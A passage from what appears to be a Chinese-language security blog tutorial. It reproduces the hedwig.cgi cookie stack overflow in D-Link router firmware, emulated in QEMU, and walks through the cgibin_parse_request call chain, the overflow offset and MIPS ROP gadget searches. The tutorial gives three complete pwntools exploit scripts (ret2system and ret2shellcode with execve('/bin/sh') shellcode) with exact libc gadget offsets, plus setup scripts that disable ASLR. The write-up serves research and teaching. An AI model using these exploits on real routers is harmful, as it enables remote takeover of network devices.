<p>如果记性不错的话应该能想起来它是一个回调函数，在 <code>hedwigcgi_main</code> 函数中出现过 <code>cgibin_parse_request((int)sub_409A6C, 0, 0x20000u);</code> 因此就要去分析 <code>cgibin_parse_request</code> 函数，看看是何时调用了 <code>409A6C</code> 函数</p>
<h5 id="cgibin-parse-request"><a href="#cgibin-parse-request" class="headerlink" title="cgibin_parse_request"></a>cgibin_parse_request</h5><p>这里是 <code>cgibin_parse_request</code> 函数的后部分，前部分要满足 <code>CONTENT_LENGTH &lt; 0x20000</code> 和 <code>REQUEST_URI</code> 这个值要存在，这样才能走到下面这部分</p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211014282.png" alt="image-20230521101434200" style="zoom: 67%;" />

<p>这里设置 <code>CONTENT_TYPE</code> 为 <code>aApplication</code> ，最后会调用 <code>0x42C014[2]</code> 位置的指针，该函数指针就是 <code>0x403B10</code></p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211050021.png" alt="image-20230521105041949"></p>
<p>之后给个分析的思路吧， 实在不想写这么详细了。</p>
<p>进入 <code>403B10</code> 函数，首先 <code>CONTENT_TYPE</code> 在原本的 <code>aApplication</code> 后面要再加上字符串 <code>x-www-form-urlencoded</code> 才能进入主逻辑部分。 <code>read</code> 会读入 <code>0xc</code> 个数据，然后将这个输入的数据作为参数调用 <code>402B40</code> 函数，这个函数将刚刚读入的数据，以 <code>=</code> 进行分割。接着调用了函数指针 <code>v9</code> （这个 <code>v9</code> 就是最开始所说的回调函数 <code>409A6C</code> ），而刚刚 <code>=</code> 前面的数据会被当做参数传进来，下面再看一下 <code>409A6c</code> 函数</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211102535.png" alt="image-20230521110226484"></p>
<p>因此只要走到这里，<code>haystack</code> 就会被赋值成 <code>=</code> 前面字符串的地址。从而绕过 <code>if ( !haystack )</code> 这个判断。</p>
<p>总结一下赋值 <code>haystack</code> 的函数调用链 ：<code>cgibin_parse_requeset -&gt; 403b10 -&gt; 402b40 -&gt; 函数指针v9</code> ，初学者可以自行去详细分析上述过程。</p>
<h3 id="qemu-用户模式下复现"><a href="#qemu-用户模式下复现" class="headerlink" title="qemu 用户模式下复现"></a><code>qemu</code> 用户模式下复现</h3><h4 id="ROP-链的布置"><a href="#ROP-链的布置" class="headerlink" title="ROP 链的布置"></a><code>ROP</code> 链的布置</h4><p>现在是肯定能走到第二次的 <code>sprintf</code> 进行溢出了。现在我们来测一下溢出控制返回地址的偏移量是多少。</p>
<h5 id="如何调试"><a href="#如何调试" class="headerlink" title="如何调试"></a>如何调试</h5><p>先准备一个 <code>payload</code> 文件，里面放入 <code>COOKIE</code> 的值，这里直接用 <code>cyclic 2000 &gt; payload</code> ，不过别忘记在最开始加一个 <code>uid=</code> 字符串</p>
<p>然后写一个启动脚本（如下），这里简单说明一下这个脚本。首先使用 <code>chroot</code> 命令将当前目录 <code>squashfs-root</code> 设置为根目录，因为程序打开的文件都是相对于这个文件系统来说的。一旦将 <code>squashfs-root</code> 设置为根目录，那么 <code>qemu-mipsel</code>  就没办法使用了，因为依赖了其他目录的库文件，因此我们使用静态链接的 <code>qemu-mipsel-static</code> （我的 <code>ubuntu 18.04</code> 上用 <code>apt-get install</code> 安装的 <code>qemu-mipsel-static</code> 会报一个错误</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211510370.png" alt="image-20230521151058316"></p>
<p>原因是这个 <code>qemu-mipsel-static</code> 版本太低，我的解决方法是在 <code>ubuntu 22.04</code> 上安装后，拖到了 <code>18.04</code> 上）  </p>
<p><code>-E</code> 用于指定要在模拟的虚拟机中设置的环境变量，而这些变量是前面分析过的，进行设置即可,剩下的就和调试 <code>MIPS</code> 架构的程序一样了，有需要的话可以查看这篇 <a href="https://zikh26.github.io/posts/919c29c4.html#%E7%9B%B4%E6%8E%A5%E8%B0%83%E8%AF%95%E7%A8%8B%E5%BA%8F">文章</a></p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">!/bin/bash</span></span><br><span class="line">payload=$(echo &quot;$(cat payload)&quot;)</span><br><span class="line">sudo chroot . ./qemu-mipsel-static -E CONTENT_LENGTH=666 -E CONTENT_TYPE=&quot;application/x-www-form-urlencoded&quot; -E REQUEST_METHOD=&quot;POST&quot; -E HTTP_COOKIE=$payload -E REQUEST_URL=&quot;zikh26&quot;  -g 1234 /htdocs/web/hedwig.cgi </span><br></pre></td></tr></table></figure>



<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211147020.png" alt="image-20230521114724909"></p>
<p>发现覆盖到返回地址需要填充 <code>1043</code> 的垃圾数据。</p>
<p>通过观察函数最后返回处的汇编，这里是可以控制很多寄存器，我们接下来就是要通过这些可控的寄存器来完成 <code>ROP</code></p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211148333.png" alt="image-20230521114847280"></p>
<h5 id="ROP-system"><a href="#ROP-system" class="headerlink" title="ROP-system"></a>ROP-system</h5><p>因为这个程序的溢出是 <code>sprintf</code> 导致的， <code>\x00</code> 可以造成字符串的截断，而 <code>system</code> 函数地址末尾就是 <code>\x00</code> ，为了避免被截断，我们要先让 <code>system</code> 函数的地址减一放入一个寄存器，之后跳转到能让这个寄存器加一的 <code>gadget</code> 上。<code>MIPS</code> 架构的 <code>ROP</code> 是通过寄存器间的跳转实现的，而 <code>x86</code> 中通常是用 <code>ret</code> 指令根据栈中存放的数据来跳转的。</p>
<p>在 《揭秘家用路由器0day漏洞挖掘技术》一书中对该 <code>ROP</code>  链布局画的十分形象（如下），因为上面提到了我们能控制很多寄存器，就先在 <code>$ra</code> 寄存器布置一个让 <code>$s0</code> 加一的 <code>gadget</code> （提前控制 <code>$s0</code> 为 <code>system</code> 减一的地址），接着跳转到一段能赋值栈地址的 <code>gadget</code> 上（用于指向 <code>/bin/sh</code> ），最后跳回到 <code>system</code> 上</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211441230.png" alt="image-20230521144117106"></p>
<p>补充：</p>
<ol>
<li>程序依赖的 <code>libc</code> 是软链接 <code>libc.so.0</code> 指向的 <code>libuClibc-0.9.30.1.so</code> ，因此 <code>gadget</code> 要去这个里面找</li>
<li>找 <code>gadget</code> 的话，用 <code>IDA</code> 插件 <code>mipsrop</code> 。以上面两段 <code>gadget</code> 为例，搜寄存器加一的指令可以这么搜 <code>mipsrop.find(&quot;addiu .*,1&quot;)</code> ，当然了可能会出现下面的报错</li>
</ol>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211457716.png" alt="image-20230521145755628"></p>
<p>只需要点一下 <code>search -&gt; mips rop gadgets</code>  即可</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211458582.png" alt="image-20230521145839462"></p>
<p>能匹配到很多个 <code>gadget</code> （如下），根据自己布局的需求来选择合适的就可以</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211500301.png" alt="image-20230521150004230"></p>
<p>如果要搜将栈地址放入某个寄存器的 <code>gadget</code> ，可以用 <code>mipsrop.stackfinder()</code> 命令（如下）</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211502965.png" alt="image-20230521150247898"></p>
<p><a target="_blank" rel="noopener" href="https://bbs.kanxue.com/thread-272318.htm">winmt</a> 师傅提到 用户模式不支持多线程，而 <code>system</code> 函数会调用 <code>fork</code> 函数，从而导致 <code>fork</code> 执行失败，<code>system</code> 执行到这里后就会卡住。不过之后在系统模式下是没问题的</p>
<h6 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h6><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch=<span class="string">&#x27;mips&#x27;</span>, os=<span class="string">&#x27;linux&#x27;</span>, endian=<span class="string">&#x27;little&#x27;</span>, word_size=<span class="number">32</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">libc_base=<span class="number">0x3ff38000</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#0x4E0EC =&gt; move $a0,$s1 ; jalr $s0</span></span><br><span class="line"><span class="comment">#0x42f60 =&gt; addiu $a0,$sp,0x18 ;  jalr  $a0 </span></span><br><span class="line"><span class="comment">#0x4683C =&gt; move $a0,$s1  ;  jalr  $s3</span></span><br><span class="line"><span class="comment">#0xB814  =&gt; addiu $a1,$sp,0x18  ;  jalr  $s1 </span></span><br><span class="line"><span class="comment">#0xDEF0  =&gt; addiu $s2,$sp,0x10 ;  jalr  $s4 </span></span><br><span class="line"><span class="comment">#0x3F25C =&gt; jalr $s2</span></span><br><span class="line"><span class="comment">#0x158c8 =&gt; adddiu $s0,1  ; jalr $s5</span></span><br><span class="line"><span class="comment">#0x159cc =&gt; addiu $s5,$sp,0x10 ; move $a1,$a5 ;jalr $s0</span></span><br><span class="line"></span><br><span class="line">sys_addr=libc_base+<span class="number">0x53200</span></span><br><span class="line">payload=<span class="string">b&quot;uid=&quot;</span>+<span class="string">b&#x27;c&#x27;</span>*<span class="number">1007</span></span><br><span class="line"></span><br><span class="line">payload+=p32(sys_addr-<span class="number">1</span>)</span><br><span class="line">payload+=<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x10</span></span><br><span class="line">payload+=p32(libc_base+<span class="number">0x159cc</span>)</span><br><span class="line">payload+=<span class="string">b&#x27;c&#x27;</span>*<span class="number">0xc</span></span><br><span class="line">payload+=p32(libc_base+<span class="number">0x158c8</span>)</span><br><span class="line">payload+=p32(<span class="number">0xdeadbeef</span>)*<span class="number">4</span></span><br><span class="line">payload+=<span class="string">b&quot;/bin//sh&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;payload&quot;</span>,<span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    f.write(payload)</span><br><span class="line">f.close()</span><br></pre></td></tr></table></figure>

<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211521976.png" alt="image-20230521152152411" style="zoom:50%;" />

<p>上面的 <code>exp</code> 是可以正常走到 <code>system</code> 函数的，但是 <code>a0</code> 是 <code>/bin//sh/postxml</code> ，这是因为第一次 <code>sprintf</code> 拼接了后面的字符串常量 <code>postxml</code> 。因为地址固定的原因，我们可以直接使用 <code>libc</code> 中的 <code>/bin/sh</code> 地址 EXP如下</p>
<figure class="highlight py"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch=<span class="string">&#x27;mips&#x27;</span>, os=<span class="string">&#x27;linux&#x27;</span>, endian=<span class="string">&#x27;little&#x27;</span>, word_size=<span class="number">32</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"></span><br><span class="line">libc_base=<span class="number">0x3ff38000</span></span><br><span class="line">sys_addr=libc_base+<span class="number">0x53200</span></span><br><span class="line">bin_sh_addr=libc_base+<span class="number">0x5a448</span></span><br><span class="line">payload=<span class="string">b&quot;uid=&quot;</span>+<span class="string">b&#x27;c&#x27;</span>*<span class="number">1007</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#0x4E0EC =&gt; move $a0,$s1 ; jalr $s0</span></span><br><span class="line"><span class="comment">#0x42f60 =&gt; addiu $a0,$sp,0x18 ;  jalr  $a0 </span></span><br><span class="line"><span class="comment">#0x4683C =&gt; move $a0,$s1  ;  jalr  $s3</span></span><br><span class="line"><span class="comment">#0xB814  =&gt; addiu $a1,$sp,0x18  ;  jalr  $s1 </span></span><br><span class="line"><span class="comment">#0xDEF0  =&gt; addiu $s2,$sp,0x10 ;  jalr  $s4 </span></span><br><span class="line"><span class="comment">#0x3F25C =&gt; jalr $s2</span></span><br><span class="line"><span class="comment">#0x158c8 =&gt; adddiu $s0,1  ; jalr $s5</span></span><br><span class="line"><span class="comment">#0x159cc =&gt; addiu $s5,$sp,0x10 ; move $a1,$a5 ;jalr $s0</span></span><br><span class="line"></span><br><span class="line">payload+=p32(sys_addr-<span class="number">1</span>)<span class="comment">#$s0</span></span><br><span class="line">payload+=p32(bin_sh_addr)<span class="comment">#$s1</span></span><br><span class="line">payload+=<span class="string">b&#x27;b&#x27;</span>*<span class="number">0xc</span></span><br><span class="line">payload+=p32(libc_base+<span class="number">0x4e0ec</span>)<span class="comment">#$s5</span></span><br><span class="line">payload+=<span class="string">b&#x27;c&#x27;</span>*<span class="number">0xc</span></span><br><span class="line">payload+=p32(libc_base+<span class="number">0x158c8</span>)<span class="comment">#$ra</span></span><br><span class="line">payload+=p32(<span class="number">0xdeadbeef</span>)*<span class="number">4</span></span><br><span class="line">payload+=<span class="string">b&quot;/bin/sh;deadbeef;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;payload&quot;</span>,<span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    f.write(payload)</span><br><span class="line">f.close()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211526368.png" alt="image-20230521152651843" style="zoom: 50%;" />

<p>可以发现这次是成功执行到了 <code>system(&quot;/bin/sh&quot;)</code> ，因为 <code>fork</code> 的原因，依然是拿不到 <code>shell</code></p>
<h5 id="ROP-ret2shellcode"><a href="#ROP-ret2shellcode" class="headerlink" title="ROP-ret2shellcode"></a>ROP-ret2shellcode</h5><p>明白了上面 <code>ROP</code> 的思想，那么布置 <code>shellcode</code> 也就不在话下，因为 <code>shellcode</code> 能直接调用 <code>execve</code> 从而不需要去使用 <code>fork</code>。不过需要注意的是 <code>shellcode</code> 中不能出现 <code>\x00</code> 还有缓存不一致性（数据缓存区和指令缓存区需要一个时间来同步），因此需要先调用一下 <code>sleep(1)</code> 再去执行 <code>shellcode</code>。</p>
<p>这里还需要提到一点，如果现在执行了 <code>gadgetA</code> ，然后跳转到了 <code>sleep(1)</code> 函数，等函数返回时会再跳转到了 <code>gadgetA</code>，因此必须要保证 <code>gadgetA</code> 回来后依然能去跳转到我们指定的地址，以此来保证 <code>ROP</code> 不间断。</p>
<p>画了个抽象的图（如下）</p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305240902843.png" alt="image-20230524090213648" style="zoom: 67%;" />

<h6 id="EXP-1"><a href="#EXP-1" class="headerlink" title="EXP"></a>EXP</h6><figure class="highlight py"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch=<span class="string">&#x27;mips&#x27;</span>, os=<span class="string">&#x27;linux&#x27;</span>, endian=<span class="string">&#x27;little&#x27;</span>, word_size=<span class="number">32</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">libc_base=<span class="number">0x3ff38000</span></span><br><span class="line">sys_addr=libc_base+<span class="number">0x53200</span></span><br><span class="line">bin_sh_addr=libc_base+<span class="number">0x5a448</span></span><br><span class="line">sleep=libc_base+<span class="number">0x56bd0</span></span><br><span class="line">payload=<span class="string">b&quot;uid=&quot;</span>+<span class="string">b&#x27;c&#x27;</span>*(<span class="number">1007</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#0x4E0EC =&gt; move $a0,$s1 ; jalr $s0</span></span><br><span class="line"><span class="comment">#0x42f60 =&gt; addiu $a0,$sp,0x18 ;  jalr  $a0 </span></span><br><span class="line"><span class="comment">#0x4683C =&gt; move $a0,$s1  ;  jalr  $s3</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#0xB814  =&gt; addiu $a1,$sp,0x18  ;  jalr  $s1 </span></span><br><span class="line"><span class="comment">#-------------------------</span></span><br><span class="line"><span class="comment">#0xDEF0  =&gt; addiu $s2,$sp,0x10 ;  jalr  $s4 </span></span><br><span class="line"><span class="comment">#0x436D0 =&gt; move $t9,$s3 ; jalr $t9</span></span><br><span class="line"><span class="comment">#0x3F25C =&gt; jalr $s2</span></span><br><span class="line"><span class="comment">#0x57E50 =&gt; li $a0,1 ;  jalr  $s1 </span></span><br><span class="line"><span class="comment">#-------------------------</span></span><br><span class="line"><span class="comment">#0x158c8 =&gt; adddiu $s0,1  ; jalr $s5</span></span><br><span class="line"><span class="comment">#0x159cc =&gt; addiu $s5,$sp,0x10 ; move $a1,$a5 ;jalr $s0</span></span><br><span class="line">shellcode = asm(<span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">    slti $a2, $zero, -1</span></span><br><span class="line"><span class="string">    li $t7, 0x69622f2f</span></span><br><span class="line"><span class="string">    sw $t7, -12($sp)</span></span><br><span class="line"><span class="string">    li $t6, 0x68732f6e</span></span><br><span class="line"><span class="string">    sw $t6, -8($sp)</span></span><br><span class="line"><span class="string">    sw $zero, -4($sp)</span></span><br><span class="line"><span class="string">    la $a0, -12($sp)</span></span><br><span class="line"><span class="string">    slti $a1, $zero, -1</span></span><br><span class="line"><span class="string">    li $v0, 4011</span></span><br><span class="line"><span class="string">    syscall 0x40404</span></span><br><span class="line"><span class="string">        &#x27;&#x27;&#x27;</span>)</span><br><span class="line">payload+=p32(<span class="number">0xdeadbeef</span>)<span class="comment">#$s0</span></span><br><span class="line">payload+=p32(libc_base+<span class="number">0x436d0</span>)<span class="comment">#$s1</span></span><br><span class="line">payload+=p32(<span class="number">0xdeadbeef</span>)<span class="comment">#$s2</span></span><br><span class="line">payload+=p32(sleep)<span class="comment">#$s3</span></span><br><span class="line">payload+=p32(libc_base+<span class="number">0x3f25c</span>)<span class="comment">#$s4</span></span><br><span class="line">payload+=p32(<span class="number">0xdeadbeef</span>)<span class="comment">#$s5</span></span><br><span class="line">payload+=<span class="string">b&#x27;c&#x27;</span>*<span class="number">0xc</span></span><br><span class="line">payload+=p32(libc_base+<span class="number">0x57e50</span>)<span class="comment">#$ra</span></span><br><span class="line">payload+=p32(<span class="number">0xdeadbeef</span>)*<span class="number">10</span></span><br><span class="line">payload+=p32(libc_base+<span class="number">0x3f25c</span>)<span class="comment">#$s4</span></span><br><span class="line">payload+=p32(libc_base+<span class="number">0xdef0</span>)<span class="comment">#second return address $ra</span></span><br><span class="line">payload+=p32(<span class="number">0xdeadbeef</span>)*<span class="number">4</span></span><br><span class="line">payload+=shellcode</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;payload&quot;</span>,<span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    f.write(payload)</span><br><span class="line">f.close()</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211617086.png" alt="image-20230521161702923"></p>
<p>可以看到这次是拿到 <code>shell</code> 了。不过这里执行 <code>execve(&quot;/bin/sh&quot;)</code> 成功其实是一种假象，因为固件中的 <code>/bin/sh</code> 链接到了 <code>busybox</code> 上，虽然 <code>busybox</code> 是静态链接，但因为它是 <code>MIPS</code> 架构，导致了我在 <code>x64</code> 上直接执行是失败的。因此我上面是把原本的 <code>sh</code> 给删掉，换成了主机自带的 <code>x64</code> 架构的 <code>sh</code> ，同时还把相应的动态库都放到了当前的 <code>/lib</code> 下面，才算执行成功。不然用原本的 <code>sh</code> 还是执行失败，这么做的目的仅仅是为了证明这种操作理论上是可以拿到 <code>shell</code> 的 😎</p>
<h3 id="qemu-系统模式下复现"><a href="#qemu-系统模式下复现" class="headerlink" title="qemu 系统模式下复现"></a><code>qemu</code> 系统模式下复现</h3><p>只要在 <code>qemu</code> 用户模式下能复现成功，并且搞清楚原理，其实这个 <code>qemu</code> 系统模式搞的很快。首先实现一下 <code>qemu</code> 与宿主机的通信，然后把 <code>httpd</code> 服务启起来就可以发送数据包直接打了（在不遇到什么奇怪的报错下确实比较快…）</p>
<p>我这里的环境是 <code>ubuntu 18.04</code> <code>qemu-system-mipsel 7.2.0</code> </p>
<h4 id="实现宿主机与-qemu-的通信"><a href="#实现宿主机与-qemu-的通信" class="headerlink" title="实现宿主机与 qemu 的通信"></a>实现宿主机与 <code>qemu</code> 的通信</h4><p>创建一个 <code>net.sh</code> 脚本，我这里的网卡是 <code>ens33</code> ，如果是 <code>eth0</code>  的话，就把出现的 <code>ens33</code> 换成 <code>eth0</code> 即可，<code>chmod +x net.sh</code> 给文件可执行权限，然后 <code>./net.sh</code> 运行</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">!/bin/sh</span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">sudo ifconfig eth0 down                 <span class="comment"># 首先关闭宿主机网卡接口</span></span></span><br><span class="line">sudo brctl addbr br0                     # 添加一座名为 br0 的网桥</span><br><span class="line">sudo brctl addif br0 ens33                # 在 br0 中添加一个接口</span><br><span class="line">sudo brctl stp br0 off                   # 如果只有一个网桥，则关闭生成树协议</span><br><span class="line">sudo brctl setfd br0 1                   # 设置 br0 的转发延迟</span><br><span class="line">sudo brctl sethello br0 1                # 设置 br0 的 hello 时间</span><br><span class="line">sudo ifconfig br0 0.0.0.0 promisc up     # 启用 br0 接口</span><br><span class="line">sudo ifconfig ens33 0.0.0.0 promisc up    # 启用网卡接口</span><br><span class="line">sudo dhclient br0                        # 从 dhcp 服务器获得 br0 的 IP 地址</span><br><span class="line">sudo brctl show br0                      # 查看虚拟网桥列表</span><br><span class="line">sudo brctl showstp br0                   # 查看 br0 的各接口信息</span><br></pre></td></tr></table></figure>



<p>然后再执行如下几条命令</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">!/bin/sh</span></span><br><span class="line">sudo tunctl -t tap0 -u root              # 创建一个 tap0 接口，只允许 root 用户访问</span><br><span class="line">sudo brctl addif br0 tap0                # 在虚拟网桥中增加一个 tap0 接口</span><br><span class="line">sudo ifconfig tap0 0.0.0.0 promisc up    # 启用 tap0 接口</span><br><span class="line">sudo brctl showstp br0</span><br></pre></td></tr></table></figure>



<p>再用下面这个脚本启动</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">sudo qemu-system-mipsel -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mipsel_standard.qcow2 -append &quot;root=/dev/sda1 console=tty0&quot; -nographic -net nic -net tap,ifname=tap0,script=no,downscript=no</span><br></pre></td></tr></table></figure>

<p>这个 <code>mips</code> 内核还有镜像文件，之前师傅们上放的链接好像都失效了。这里是找 <strong>winmt</strong> 师傅要的一份，上传到网盘上了  链接：<a target="_blank" rel="noopener" href="https://pan.baidu.com/s/1-qvt7pG0Tr91JKoH2elNdQ?pwd=l04v">https://pan.baidu.com/s/1-qvt7pG0Tr91JKoH2elNdQ?pwd=l04v</a><br>提取码：l04v</p>
<p>如果此时 <code>qemu</code> 中的网卡 <code>eth0</code> 是有 <code>ip</code> 的，并且能够 <code>ping</code> 通宿主机的 <code>ip</code>，那就能说明 <code>qemu</code> 已经能和宿主机进行通信了</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305212333766.png" alt="image-20230521233355276"></p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305212334427.png" alt="image-20230521233441258"></p>
<h4 id="启动-httpd-服务"><a href="#启动-httpd-服务" class="headerlink" title="启动 httpd 服务"></a>启动 <code>httpd</code> 服务</h4><p>在 <code>squashfs-root</code> 的上一级目录中，执行下面的命令， <code>IP</code> 换成 <code>qemu</code> 的。这样可以实现计算机远程之间的文件传输，作用就是把提取出来的文件系统传到 <code>qemu</code> 里面</p>
<p><code>sudo  scp -r ./squashfs-root root@10.214.140.139:/root/squashfs-root</code></p>
<p>然后在 <code>qemu</code> 中的 <code>squashfs-root</code> 目录下新建一个 <code>http_conf</code> 文件</p>
<p>写入以下代码（网卡和 <code>IP</code> <code>port</code> 要改成自己的）</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Umask 026</span><br><span class="line">PIDFile /var/run/httpd.pid</span><br><span class="line">LogGMT On  #开启log</span><br><span class="line">ErrorLog /log #log文件</span><br><span class="line"></span><br><span class="line">Tuning</span><br><span class="line">&#123;</span><br><span class="line">    NumConnections 15</span><br><span class="line">    BufSize 12288</span><br><span class="line">    InputBufSize 4096</span><br><span class="line">    ScriptBufSize 4096</span><br><span class="line">    NumHeaders 100</span><br><span class="line">    Timeout 60</span><br><span class="line">    ScriptTimeout 60</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">Control</span><br><span class="line">&#123;</span><br><span class="line">    Types</span><br><span class="line">    &#123;</span><br><span class="line">        text/html    &#123; html htm &#125;</span><br><span class="line">        text/xml    &#123; xml &#125;</span><br><span class="line">        text/plain    &#123; txt &#125;</span><br><span class="line">        image/gif    &#123; gif &#125;</span><br><span class="line">        image/jpeg    &#123; jpg &#125;</span><br><span class="line">        text/css    &#123; css &#125;</span><br><span class="line">        application/octet-stream &#123; * &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    Specials</span><br><span class="line">    &#123;</span><br><span class="line">        Dump        &#123; /dump &#125;</span><br><span class="line">        CGI            &#123; cgi &#125;</span><br><span class="line">        Imagemap    &#123; map &#125;</span><br><span class="line">        Redirect    &#123; url &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    External</span><br><span class="line">    &#123;</span><br><span class="line">        /usr/sbin/phpcgi &#123; php &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Server</span><br><span class="line">&#123;</span><br><span class="line">    ServerName &quot;Linux, HTTP/1.1, &quot;</span><br><span class="line">    ServerId &quot;1234&quot;</span><br><span class="line">    Family inet</span><br><span class="line">    Interface eth0  #对应qemu仿真路由器系统的网卡</span><br><span class="line">    Address 10.214.140.139 #qemu仿真路由器系统的IP</span><br><span class="line">    Port &quot;80&quot; #对应未被使用的端口</span><br><span class="line">    Virtual</span><br><span class="line">    &#123;</span><br><span class="line">        AnyHost</span><br><span class="line">        Control</span><br><span class="line">        &#123;</span><br><span class="line">            Alias /</span><br><span class="line">            Location /htdocs/web</span><br><span class="line">            IndexNames &#123; index.php &#125;</span><br><span class="line">            External</span><br><span class="line">            &#123;</span><br><span class="line">                /usr/sbin/phpcgi &#123; router_info.xml &#125;</span><br><span class="line">                /usr/sbin/phpcgi &#123; post_login.xml &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        Control</span><br><span class="line">        &#123;</span><br><span class="line">            Alias /HNAP1</span><br><span class="line">            Location /htdocs/HNAP1</span><br><span class="line">            External</span><br><span class="line">            &#123;</span><br><span class="line">                /usr/sbin/hnap &#123; hnap &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            IndexNames &#123; index.hnap &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>然后在物理机上 <code>/opt/tools/mipsel</code> 目录（没有的话就自己创建吧）中新建 <code>init.sh</code> 文件，写入如下配置</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">! /bin/sh</span></span><br><span class="line">sudo sysctl -w net.ipv4.ip_forward=1</span><br><span class="line">sudo iptables -F</span><br><span class="line">sudo iptables -X</span><br><span class="line">sudo iptables -t nat -F</span><br><span class="line">sudo iptables -t nat -X</span><br><span class="line">sudo iptables -t mangle -F</span><br><span class="line">sudo iptables -t mangle -X</span><br><span class="line">sudo iptables -P INPUT ACCEPT</span><br><span class="line">sudo iptables -P FORWARD ACCEPT</span><br><span class="line">sudo iptables -P OUTPUT ACCEPT</span><br><span class="line">sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE</span><br><span class="line">sudo iptables -I FORWARD 1 -i tap0 -j ACCEPT</span><br><span class="line">sudo iptables -I FORWARD 1 -o tap0 -m state --state RELATED,ESTABLISHED -j ACCEPT</span><br></pre></td></tr></table></figure>

<p>给这个 <code>init.sh</code> ，可执行权限，然后将其执行</p>
<p>然后在 <code>qemu</code> 中的 <code>squashfs-root</code> 目录下创建 <code>init.sh</code> 文件，写入下面的内容。给可执行权限，然后执行</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">!/bin/bash</span></span><br><span class="line">echo 0 &gt; /proc/sys/kernel/randomize_va_space</span><br><span class="line">cp http_conf /</span><br><span class="line">cp sbin/httpd /</span><br><span class="line">cp -rf htdocs/ /</span><br><span class="line">mkdir /etc_bak</span><br><span class="line">cp -r /etc /etc_bak</span><br><span class="line">rm /etc/services</span><br><span class="line">cp -rf etc/ /</span><br><span class="line">cp lib/ld-uClibc-0.9.30.1.so  /lib/</span><br><span class="line">cp lib/libcrypt-0.9.30.1.so  /lib/</span><br><span class="line">cp lib/libc.so.0  /lib/</span><br><span class="line">cp lib/libgcc_s.so.1  /lib/</span><br><span class="line">cp lib/ld-uClibc.so.0  /lib/</span><br><span class="line">cp lib/libcrypt.so.0  /lib/</span><br><span class="line">cp lib/libgcc_s.so  /lib/</span><br><span class="line">cp lib/libuClibc-0.9.30.1.so  /lib/</span><br><span class="line">cd /</span><br><span class="line">rm -rf /htdocs/web/hedwig.cgi</span><br><span class="line">rm -rf /usr/sbin/phpcgi</span><br><span class="line">rm -rf /usr/sbin/hnap</span><br><span class="line">ln -s /htdocs/cgibin 